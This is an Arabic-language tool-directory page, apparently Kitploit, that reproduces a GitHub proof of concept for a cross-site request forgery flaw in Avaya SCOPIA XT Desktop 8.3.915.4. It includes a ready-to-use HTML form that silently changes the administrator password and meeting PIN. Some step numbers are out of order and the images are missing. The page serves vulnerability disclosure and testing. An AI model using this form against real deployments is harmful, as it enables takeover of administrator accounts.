Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — إثبات مفهوم يعرض ثغرة تزوير الطلبات عبر المواقع (CSRF) في Avaya SCOPIA XT Desktop، مما يتيح تغيير كلمة مرور المسؤول دون وجود رمز مضاد لـ CSRF. | Kitploit
أدوات/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

إثبات مفهوم يعرض ثغرة تزوير الطلبات عبر المواقع (CSRF) في Avaya SCOPIA XT Desktop، مما يتيح تغيير كلمة مرور المسؤول دون وجود رمز مضاد لـ CSRF.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد

استغلال CSRF على SCOPIA XT Desktop الإصدار 8.3.915.4

سيصف هذا الـ PoC كيفية استغلال تزوير الطلبات عبر المواقع (CSRF) على SCOPIA XT Desktop الإصدار 8.3.915.4


حول SCOPIA

الموقع الإلكتروني: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


حول تزوير الطلبات عبر المواقع (CSRF)

تزوير الطلبات عبر المواقع، المعروف أيضًا باسم هجوم النقرة الواحدة أو ركوب الجلسة ويُختصر بـ CSRF أو XSRF، هو نوع من الاستغلال الخبيث لموقع ويب حيث يتم إرسال أوامر غير مصرح بها من مستخدم يثق به تطبيق الويب.


إثبات المفهوم - تغيير كلمة مرور المسؤول

1

في صفحة "Directory and Authentication"، يمكن للمسؤول تغيير كلمة المرور الخاصة به.

2

عند التقاط الطلب باستخدام Burp Suite، لاحظت أنه لم يتم تطبيق رمز anti-CSRF وأن آلية الأمان الوحيدة هي كوكي الجلسة.

6

أنشأت ملف HTML هذا الذي كان بمثابة إثبات مفهوم (PoC) لاستغلال الثغرة المعروضة.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

عند تشغيله في المتصفح الذي يحتوي على كوكي صالح لبيئة إدارة SCOPIA XT Desktop، كان من الممكن تغيير كلمة مرور المستخدم admin إلى "attacker":

4

5

تنزيل الأداة